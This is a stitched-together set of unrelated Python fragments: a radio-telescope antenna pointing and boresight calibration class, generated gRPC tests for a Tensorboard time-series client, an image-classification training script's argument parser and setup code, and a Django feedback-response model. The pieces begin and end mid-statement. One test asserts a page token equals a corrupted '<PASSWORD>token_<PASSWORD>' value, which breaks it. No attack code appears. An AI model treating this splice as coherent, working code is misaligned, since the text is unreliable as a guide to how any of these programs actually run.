This will not point to the source if the source is not currently up. Args: name_or_dict (str/dict): Either a source name or a dictionary Returns: str: result of Antenna.point_radec command """ convert = 180./ np.pi src = self._get_source_from_str_or_dict(name_or_dict) name = src["name"] report = self.report_source_info(src) for line in report: self.logger.info("point: {}".format(line)) if float(src["el"])*convert < 10.0: msg = ("point: {} is currently not up. " "Not pointing. Current az el: {} {}").format( name, float(src["az"])*convert, float(src["el"])*convert) self.logger.error(msg) raise MC.MonitorControlError([], msg) self.info["point"]["current_source"] = src resp = self.hdwr("Antenna", "point_radec", src["_ra"], src["_dec"]) self.logger.debug("point: resp from Antenna: {}".format(resp)) return resp # ------------------------------ Calibration ------------------------------ def _create_calibration_file_path(self, base_dir, prefix, file_type="hdf5"): """ create full path for a calibration file """ self.logger.debug( "_create_calibration_file_path: base_dir: {}, prefix: {}".format( base_dir, prefix ) ) timestamp = datetime.datetime.utcnow().strftime("%Y-%j-%Hh%Mm%Ss") doy, year = datetime.datetime.utcnow().strftime("%j,%Y").split(",") calib_dir = os.path.join(base_dir, year, doy) f_name = "{}_{}.{}".format(prefix, timestamp, file_type) f_path = f_name if not os.path.exists(calib_dir): try: os.makedirs(calib_dir) f_path = os.path.join(calib_dir, f_name) except Exception as err: self.logger.error( ("_create_calibration_file_path: " "Couldn't create calibration directory {}").format( calib_dir)) pass else: f_path = os.path.join(calib_dir, f_name) return f_path def _create_calibration_file_obj(self, base_dir, prefix, file_cls=h5py.File): """ Create a calibration file object. This could be minical, boresight, or tipping. Will create a file object whose path is as follows: .. 
code-block:none base_dir/<year>/<doy>/prefix_<timestamp>.hdf5 Args: base_dir (str): Base directory where data files are stored. Will store data file in base_dir/<year>/<doy> subdirectory. prefix (str): file_cls (type, optional): """ f_path = self._create_calibration_file_path(base_dir, prefix) self.logger.debug("_create_calibration_file_obj: path is %s", f_path) f_obj = file_cls(f_path, "w") return f_obj, f_path @Pyro5.api.oneway @async_method def scanning_boresight(self, el_previous_offset, xel_previous_offset, limit=99.0, sample_rate=0.3, rate=3.0, settle_time=10.0, src_name_or_dict=None, two_direction=True, additional_offsets=None, channel=0, attrs=None): """ Scanning boresight. Instead of choosing a predetermined set of points and stopping at each point, this sets an initial point, and moves continuously at rate ``rate`` to a final point, collecting system temperature data along the way. Scanning boresight is not yet ready to be used to accurately calculate position offsets. It can be used in situations where initial offsets are not well known, and then improved upon with stepping boresight. Args: el_previous_offset (float): Previous position offset in EL xel_previous_offset (float): Previous position offset in xEL limit (float, optional): How far on either side of initial axis point to start and finish. For example, if initial offset in elevation is 10, and limit is 50, boresight will send antenna to -40, and end up at +60 mdeg in elevation offset. sample_rate (float, optional): How often to attempt to get system temperature data (0.3) rate (float, optional): Offset rate. This is how fast antenna will continuously change offset between initial and ending point (3.0) settle_time (float, optional): Amount of time to settle after setting initial offsets src_name_or_dict (str/dict, optional): A string or dictionary corresponding to a source whose information we want to store with HDF5 results file. 
two_direction (bool, optional): Whether or not to run boresight in both directions in both axis. Setting this to True results in potentially more accurate offset calculations, at the cost of doubling execution time. additional_offsets (dict, optional): Additional offsets to set before starting boresight. This is necessary because this implementation clears offsets before starting scan. channels (int, optional): Which tsys channel to use to calculate offsets. Defaults to 0. attrs (dict, optional): Additional meta data to add to HDF5 file. Returns: tuple: tsys: tsys data from each power meter for each axis, in each direction, along with offset data, time offsets between tsys data and offsets, and corrected offset measurements. fits: fits from pol1 data for each axis, in each direction """ if additional_offsets is None: additional_offsets = {} if attrs is None: attrs = {} attrs.update(additional_offsets) # we want to include any information # about additional offsets in attrs dict self.logger.debug("scanning_boresights: attrs: %s", attrs) # this is the order of the scans order = ["EL", "XEL"] # these are the commands to the NMC to get the offsets now in use total_offset_params = { "EL": "ElevationManualOffset", "XEL": "CrossElevationManualOffset" } # these are the commands to the NMC to get the currrent rate offsets accum_offset_params = { "EL": "ElevationAccumulatedRateOffset", "XEL": "CrossElevationAccumulatedRateOffset" } # this is the command to get the time for the axis angles timestamp_param = "AxisAngleTime" def timestamp_formatter(t): return datetime.datetime.fromtimestamp(float(t)) # parameters describing scan on one axis single_axis_dict = { "offset": [], "tsys": [], "time_offset": [], "offset_corrected": [], "offset_before":
gca_tensorboard_time_series.TensorboardTimeSeries() client.update_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "tensorboard_time_series.name=tensorboard_time_series.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_tensorboard_time_series_field_headers_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = tensorboard_service.UpdateTensorboardTimeSeriesRequest() request.tensorboard_time_series.name = "tensorboard_time_series.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_tensorboard_time_series), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( gca_tensorboard_time_series.TensorboardTimeSeries() ) await client.update_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "tensorboard_time_series.name=tensorboard_time_series.name/value", ) in kw["metadata"] def test_update_tensorboard_time_series_flattened(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = gca_tensorboard_time_series.TensorboardTimeSeries() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_tensorboard_time_series( tensorboard_time_series=gca_tensorboard_time_series.TensorboardTimeSeries( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] arg = args[0].tensorboard_time_series mock_val = gca_tensorboard_time_series.TensorboardTimeSeries(name="name_value") assert arg == mock_val arg = args[0].update_mask mock_val = field_mask_pb2.FieldMask(paths=["paths_value"]) assert arg == mock_val def test_update_tensorboard_time_series_flattened_error(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_tensorboard_time_series( tensorboard_service.UpdateTensorboardTimeSeriesRequest(), tensorboard_time_series=gca_tensorboard_time_series.TensorboardTimeSeries( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_tensorboard_time_series_flattened_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. 
call.return_value = gca_tensorboard_time_series.TensorboardTimeSeries() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( gca_tensorboard_time_series.TensorboardTimeSeries() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_tensorboard_time_series( tensorboard_time_series=gca_tensorboard_time_series.TensorboardTimeSeries( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] arg = args[0].tensorboard_time_series mock_val = gca_tensorboard_time_series.TensorboardTimeSeries(name="name_value") assert arg == mock_val arg = args[0].update_mask mock_val = field_mask_pb2.FieldMask(paths=["paths_value"]) assert arg == mock_val @pytest.mark.asyncio async def test_update_tensorboard_time_series_flattened_error_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_tensorboard_time_series( tensorboard_service.UpdateTensorboardTimeSeriesRequest(), tensorboard_time_series=gca_tensorboard_time_series.TensorboardTimeSeries( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_list_tensorboard_time_series( transport: str = "grpc", request_type=tensorboard_service.ListTensorboardTimeSeriesRequest, ): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = tensorboard_service.ListTensorboardTimeSeriesResponse( next_page_token="next_page_token_value", ) response = client.list_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == tensorboard_service.ListTensorboardTimeSeriesRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListTensorboardTimeSeriesPager) assert response.next_page_token == "<PASSWORD>token_<PASSWORD>" def test_list_tensorboard_time_series_from_dict(): test_list_tensorboard_time_series(request_type=dict) def test_list_tensorboard_time_series_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: client.list_tensorboard_time_series() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == tensorboard_service.ListTensorboardTimeSeriesRequest() @pytest.mark.asyncio async def test_list_tensorboard_time_series_async( transport: str = "grpc_asyncio", request_type=tensorboard_service.ListTensorboardTimeSeriesRequest, ): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. 
with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( tensorboard_service.ListTensorboardTimeSeriesResponse( next_page_token="next_page_token_value", ) ) response = await client.list_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == tensorboard_service.ListTensorboardTimeSeriesRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListTensorboardTimeSeriesAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_tensorboard_time_series_async_from_dict(): await test_list_tensorboard_time_series_async(request_type=dict) def test_list_tensorboard_time_series_field_headers(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = tensorboard_service.ListTensorboardTimeSeriesRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: call.return_value = tensorboard_service.ListTensorboardTimeSeriesResponse() client.list_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. 
_, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_tensorboard_time_series_field_headers_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = tensorboard_service.ListTensorboardTimeSeriesRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( tensorboard_service.ListTensorboardTimeSeriesResponse() ) await client.list_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_tensorboard_time_series_flattened(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = tensorboard_service.ListTensorboardTimeSeriesResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_tensorboard_time_series(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. 
assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] arg = args[0].parent mock_val = "parent_value" assert arg == mock_val def test_list_tensorboard_time_series_flattened_error(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_tensorboard_time_series( tensorboard_service.ListTensorboardTimeSeriesRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_tensorboard_time_series_flattened_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = tensorboard_service.ListTensorboardTimeSeriesResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( tensorboard_service.ListTensorboardTimeSeriesResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_tensorboard_time_series(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] arg = args[0].parent mock_val = "parent_value" assert arg == mock_val @pytest.mark.asyncio async def test_list_tensorboard_time_series_flattened_error_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. 
with pytest.raises(ValueError): await client.list_tensorboard_time_series( tensorboard_service.ListTensorboardTimeSeriesRequest(), parent="parent_value", ) def test_list_tensorboard_time_series_pager(): client = TensorboardServiceClient(credentials=ga_credentials.AnonymousCredentials,) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( tensorboard_service.ListTensorboardTimeSeriesResponse( tensorboard_time_series=[ tensorboard_time_series.TensorboardTimeSeries(), tensorboard_time_series.TensorboardTimeSeries(), tensorboard_time_series.TensorboardTimeSeries(), ], next_page_token="abc", ), tensorboard_service.ListTensorboardTimeSeriesResponse( tensorboard_time_series=[], next_page_token="def", ), tensorboard_service.ListTensorboardTimeSeriesResponse( tensorboard_time_series=[ tensorboard_time_series.TensorboardTimeSeries(), ], next_page_token="ghi", ), tensorboard_service.ListTensorboardTimeSeriesResponse( tensorboard_time_series=[ tensorboard_time_series.TensorboardTimeSeries(), tensorboard_time_series.TensorboardTimeSeries(), ], ), RuntimeError, ) metadata = () metadata =
<gh_stars>0 # Copyright (c) 2018-2019, NVIDIA CORPORATION # Copyright (c) 2017- Facebook, Inc # # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # * Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
import argparse import random from copy import deepcopy import signal import torch.backends.cudnn as cudnn import torch.distributed as dist import torch.nn.parallel import torch.optim import torch.utils.data import torch.utils.data.distributed import torchvision.transforms as transforms import torchvision.datasets as datasets from torch.nn.parallel import DistributedDataParallel as DDP import image_classification.logger as log from image_classification.smoothing import LabelSmoothing from image_classification.mixup import NLLMultiLabelSmooth, MixUpWrapper from image_classification.dataloaders import * from image_classification.training import * from image_classification.utils import * from image_classification.models import ( resnet50, resnext101_32x4d, se_resnext101_32x4d, efficientnet_b0, efficientnet_b4, efficientnet_widese_b0, efficientnet_widese_b4, ) import dllogger def available_models(): models = { m.name: m for m in [ resnet50, resnext101_32x4d, se_resnext101_32x4d, efficientnet_b0, efficientnet_b4, efficientnet_widese_b0, efficientnet_widese_b4, ] } return models def add_parser_arguments(parser, skip_arch=False): parser.add_argument("data", metavar="DIR", help="path to dataset") parser.add_argument( "--data-backend", metavar="BACKEND", default="dali-cpu", choices=DATA_BACKEND_CHOICES, help="data backend: " + " | ".join(DATA_BACKEND_CHOICES) + " (default: dali-cpu)", ) parser.add_argument( "--interpolation", metavar="INTERPOLATION", default="bilinear", help="interpolation type for resizing images: bilinear, bicubic or triangular(DALI only)", ) if not skip_arch: model_names = available_models().keys() parser.add_argument( "--arch", "-a", metavar="ARCH", default="resnet50", choices=model_names, help="model architecture: " + " | ".join(model_names) + " (default: resnet50)", ) parser.add_argument( "-j", "--workers", default=5, type=int, metavar="N", help="number of data loading workers (default: 5)", ) parser.add_argument( "--epochs", default=90, type=int, 
metavar="N", help="number of total epochs to run", ) parser.add_argument( "--run-epochs", default=-1, type=int, metavar="N", help="run only N epochs, used for checkpointing runs", ) parser.add_argument( "--early-stopping-patience", default=-1, type=int, metavar="N", help="early stopping after N epochs without validation accuracy improving", ) parser.add_argument( "--image-size", default=None, type=int, help="resolution of image" ) parser.add_argument( "-b", "--batch-size", default=256, type=int, metavar="N", help="mini-batch size (default: 256) per gpu", ) parser.add_argument( "--optimizer-batch-size", default=-1, type=int, metavar="N", help="size of a total batch size, for simulating bigger batches using gradient accumulation", ) parser.add_argument( "--lr", "--learning-rate", default=0.1, type=float, metavar="LR", help="initial learning rate", ) parser.add_argument( "--lr-schedule", default="step", type=str, metavar="SCHEDULE", choices=["step", "linear", "cosine"], help="Type of LR schedule: {}, {}, {}".format("step", "linear", "cosine"), ) parser.add_argument("--end-lr", default=0, type=float) parser.add_argument( "--warmup", default=0, type=int, metavar="E", help="number of warmup epochs" ) parser.add_argument( "--label-smoothing", default=0.0, type=float, metavar="S", help="label smoothing", ) parser.add_argument( "--mixup", default=0.0, type=float, metavar="ALPHA", help="mixup alpha" ) parser.add_argument( "--optimizer", default="sgd", type=str, choices=("sgd", "rmsprop") ) parser.add_argument( "--momentum", default=0.9, type=float, metavar="M", help="momentum" ) parser.add_argument( "--weight-decay", "--wd", default=1e-4, type=float, metavar="W", help="weight decay (default: 1e-4)", ) parser.add_argument( "--bn-weight-decay", action="store_true", help="use weight_decay on batch normalization learnable parameters, (default: false)", ) parser.add_argument( "--rmsprop-alpha", default=0.9, type=float, help="value of alpha parameter in rmsprop optimizer (default: 
0.9)", ) parser.add_argument( "--rmsprop-eps", default=1e-3, type=float, help="value of eps parameter in rmsprop optimizer (default: 1e-3)", ) parser.add_argument( "--nesterov", action="store_true", help="use nesterov momentum, (default: false)", ) parser.add_argument( "--print-freq", "-p", default=10, type=int, metavar="N", help="print frequency (default: 10)", ) parser.add_argument( "--resume", default=None, type=str, metavar="PATH", help="path to latest checkpoint (default: none)", ) parser.add_argument( "--static-loss-scale", type=float, default=1, help="Static loss scale, positive power of 2 values can improve amp convergence.", ) parser.add_argument( "--dynamic-loss-scale", action="store_true", help="Use dynamic loss scaling. If supplied, this argument supersedes " + "--static-loss-scale.", ) parser.add_argument( "--prof", type=int, default=-1, metavar="N", help="Run only N iterations" ) parser.add_argument( "--amp", action="store_true", help="Run model AMP (automatic mixed precision) mode.", ) parser.add_argument( "--seed", default=None, type=int, help="random seed used for numpy and pytorch" ) parser.add_argument( "--gather-checkpoints", action="store_true", help="Gather checkpoints throughout the training, without this flag only best and last checkpoints will be stored", ) parser.add_argument( "--raport-file", default="experiment_raport.json", type=str, help="file in which to store JSON experiment raport", ) parser.add_argument( "--evaluate", action="store_true", help="evaluate checkpoint/model" ) parser.add_argument("--training-only", action="store_true", help="do not evaluate") parser.add_argument( "--no-checkpoints", action="store_false", dest="save_checkpoints", help="do not store any checkpoints, useful for benchmarking", ) parser.add_argument("--checkpoint-filename", default="checkpoint.pth.tar", type=str) parser.add_argument( "--workspace", type=str, default="./", metavar="DIR", help="path to directory where checkpoints will be stored", ) 
parser.add_argument( "--memory-format", type=str, default="nchw", choices=["nchw", "nhwc"], help="memory layout, nchw or nhwc", ) parser.add_argument("--use-ema", default=None, type=float, help="use EMA") parser.add_argument( "--augmentation", type=str, default=None, choices=[None, "autoaugment"], help="augmentation method", ) def prepare_for_training(args, model_args, model_arch): args.distributed = False if "WORLD_SIZE" in os.environ: args.distributed = int(os.environ["WORLD_SIZE"]) > 1 args.local_rank = int(os.environ["LOCAL_RANK"]) else: args.local_rank = 0 args.gpu = 0 args.world_size = 1 if args.distributed: args.gpu = args.local_rank % torch.cuda.device_count() torch.cuda.set_device(args.gpu) dist.init_process_group(backend="nccl", init_method="env://") args.world_size = torch.distributed.get_world_size() if args.seed is not None: print("Using seed = {}".format(args.seed)) torch.manual_seed(args.seed + args.local_rank) torch.cuda.manual_seed(args.seed + args.local_rank) np.random.seed(seed=args.seed + args.local_rank) random.seed(args.seed + args.local_rank) def _worker_init_fn(id): np.random.seed(seed=args.seed + args.local_rank + id) random.seed(args.seed + args.local_rank + id) else: def _worker_init_fn(id): pass if args.static_loss_scale != 1.0: if not args.amp: print("Warning: if --amp is not used, static_loss_scale will be ignored.") if args.optimizer_batch_size < 0: batch_size_multiplier = 1 else: tbs = args.world_size * args.batch_size if args.optimizer_batch_size % tbs != 0: print( "Warning: simulated batch size {} is not divisible by actual batch size {}".format( args.optimizer_batch_size, tbs ) ) batch_size_multiplier = int(args.optimizer_batch_size / tbs) print("BSM: {}".format(batch_size_multiplier)) start_epoch = 0 # optionally resume from a checkpoint if args.resume is not None: if os.path.isfile(args.resume): print("=> loading checkpoint '{}'".format(args.resume)) checkpoint = torch.load( args.resume, map_location=lambda storage, loc: 
storage.cuda(args.gpu) ) start_epoch = checkpoint["epoch"] best_prec1 = checkpoint["best_prec1"] model_state = checkpoint["state_dict"] optimizer_state = checkpoint["optimizer"] if "state_dict_ema" in checkpoint: model_state_ema = checkpoint["state_dict_ema"] print( "=> loaded checkpoint '{}' (epoch {})".format( args.resume, checkpoint["epoch"] ) ) if start_epoch >= args.epochs: print( f"Launched training for {args.epochs}, checkpoint already run {start_epoch}" ) exit(1) else: print("=> no checkpoint found at '{}'".format(args.resume)) model_state = None model_state_ema = None optimizer_state = None else: model_state = None model_state_ema = None optimizer_state = None loss = nn.CrossEntropyLoss if args.mixup > 0.0: loss = lambda: NLLMultiLabelSmooth(args.label_smoothing) elif args.label_smoothing > 0.0: loss = lambda: LabelSmoothing(args.label_smoothing) memory_format = ( torch.channels_last if args.memory_format == "nhwc" else torch.contiguous_format ) model = model_arch( **{ k: v if k != "pretrained" else v and (not args.distributed or dist.get_rank() == 0) for k, v in model_args.__dict__.items() } ) image_size = ( args.image_size if args.image_size is not None else model.arch.default_image_size ) model_and_loss = ModelAndLoss(model, loss, cuda=True, memory_format=memory_format) if args.use_ema is not None: model_ema = deepcopy(model_and_loss) ema = EMA(args.use_ema) else: model_ema = None ema = None # Create data loaders and optimizers as needed if args.data_backend == "pytorch": get_train_loader = get_pytorch_train_loader get_val_loader = get_pytorch_val_loader elif args.data_backend == "dali-gpu": get_train_loader = get_dali_train_loader(dali_cpu=False) get_val_loader = get_dali_val_loader() elif args.data_backend == "dali-cpu": get_train_loader = get_dali_train_loader(dali_cpu=True) get_val_loader = get_dali_val_loader() elif args.data_backend == "syntetic": get_val_loader = get_syntetic_loader get_train_loader = get_syntetic_loader else: print("Bad 
databackend picked") exit(1) train_loader, train_loader_len = get_train_loader( args.data, image_size, args.batch_size, model_args.num_classes, args.mixup > 0.0, interpolation = args.interpolation, augmentation=args.augmentation, start_epoch=start_epoch, workers=args.workers, memory_format=memory_format, ) if args.mixup != 0.0: train_loader = MixUpWrapper(args.mixup, train_loader) val_loader, val_loader_len = get_val_loader( args.data, image_size, args.batch_size, model_args.num_classes, False, interpolation = args.interpolation, workers=args.workers, memory_format=memory_format, ) if not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0: logger = log.Logger( args.print_freq, [ dllogger.StdOutBackend( dllogger.Verbosity.DEFAULT, step_format=log.format_step ), dllogger.JSONStreamBackend( dllogger.Verbosity.VERBOSE, os.path.join(args.workspace, args.raport_file), ), ], start_epoch=start_epoch - 1, ) else: logger = log.Logger(args.print_freq, [], start_epoch=start_epoch - 1) logger.log_parameter(args.__dict__, verbosity=dllogger.Verbosity.DEFAULT) logger.log_parameter( {f"model.{k}": v for k, v in model_args.__dict__.items()}, verbosity=dllogger.Verbosity.DEFAULT, ) optimizer = get_optimizer( list(model_and_loss.model.named_parameters()), args.lr, args=args, state=optimizer_state, ) if args.lr_schedule == "step": lr_policy = lr_step_policy( args.lr, [30, 60, 80], 0.1, args.warmup,
<filename>fjord/feedback/models.py from datetime import datetime import urlparse from django.core.cache import cache from django.core.exceptions import ValidationError from django.db import models from elasticutils.contrib.django import Indexable from rest_framework import serializers from tower import ugettext_lazy as _ from product_details import product_details from fjord.base.domain import get_domain from fjord.base.models import ModelBase from fjord.base.util import smart_truncate from fjord.feedback.config import CODE_TO_COUNTRY from fjord.feedback.utils import compute_grams from fjord.search.index import ( register_mapping_type, FjordMappingType, boolean_type, date_type, integer_type, keyword_type, terms_type, text_type) from fjord.search.tasks import register_live_index from fjord.translations.models import get_translation_system_choices from fjord.translations.tasks import register_auto_translation from fjord.translations.utils import compose_key # This defines the number of characters the description can have. We # do this in code rather than in the db since it makes it easier to # tweak the value. 
TRUNCATE_LENGTH = 10000 class Product(ModelBase): """Represents a product we capture feedback for""" # Whether or not this product is enabled enabled = models.BooleanField(default=True) # Used internally for notes to make it easier to manage products notes = models.CharField(max_length=255, blank=True, default=u'') # This is the name we display everywhere display_name = models.CharField(max_length=20) # We're not using foreign keys, so when we save something to the # database, we use this name db_name = models.CharField(max_length=20) # This is the slug used in the feedback product urls; we don't use # the SlugField because we don't require slugs be unique slug = models.CharField(max_length=20) # Whether or not this product shows up on the dashboard on_dashboard = models.BooleanField(default=True) # System slated for automatic translation, or null if none; # See translation app for details. translation_system = models.CharField( choices=get_translation_system_choices(), null=True, blank=True, max_length=20, ) @classmethod def get_product_map(cls): """Returns map of product slug -> db_name""" products = cls.objects.values_list('slug', 'db_name') return dict(prod for prod in products) @register_auto_translation @register_live_index class Response(ModelBase): """Basic feedback response This consists of a bunch of information some of which is inferred and some of which comes from the source. Some fields are "sacrosanct" and should never be edited after the response was created: * happy * url * description * user_agent * manufacturer * device * created """ # This is the product/channel. # e.g. "firefox.desktop.stable", "firefox.mobile.aurora", etc. 
prodchan = models.CharField(max_length=255) # Data coming from the user happy = models.BooleanField(default=True) url = models.URLField(blank=True) description = models.TextField(blank=True) # Translation into English of the description translated_description = models.TextField(blank=True) # Data inferred from urls or explicitly stated by the thing saving # the data (webform, client of the api, etc) product = models.CharField(max_length=30, blank=True) channel = models.CharField(max_length=30, blank=True) version = models.CharField(max_length=30, blank=True) locale = models.CharField(max_length=8, blank=True) country = models.CharField(max_length=4, blank=True, null=True, default=u'') manufacturer = models.CharField(max_length=255, blank=True) device = models.CharField(max_length=255, blank=True) # User agent and inferred data from the user agent user_agent = models.CharField(max_length=255, blank=True) browser = models.CharField(max_length=30, blank=True) browser_version = models.CharField(max_length=30, blank=True) platform = models.CharField(max_length=30, blank=True) source = models.CharField(max_length=100, blank=True, null=True, default=u'') campaign = models.CharField(max_length=100, blank=True, null=True, default=u'') created = models.DateTimeField(default=datetime.now) class Meta: ordering = ['-created'] def __unicode__(self): return u'(%s) %s' % (self.sentiment, self.truncated_description) def __repr__(self): return self.__unicode__().encode('ascii', 'ignore') def generate_translation_jobs(self): """Returns a list of tuples, one for each translation job If the locale of this response is English, then we just copy over the description and we're done. If the product of this response isn't set up for auto-translation, then we're done. If we already have a response with this text that's translated, we copy the most recent translation over. Otherwise we generate a list of jobs to be done. .. 
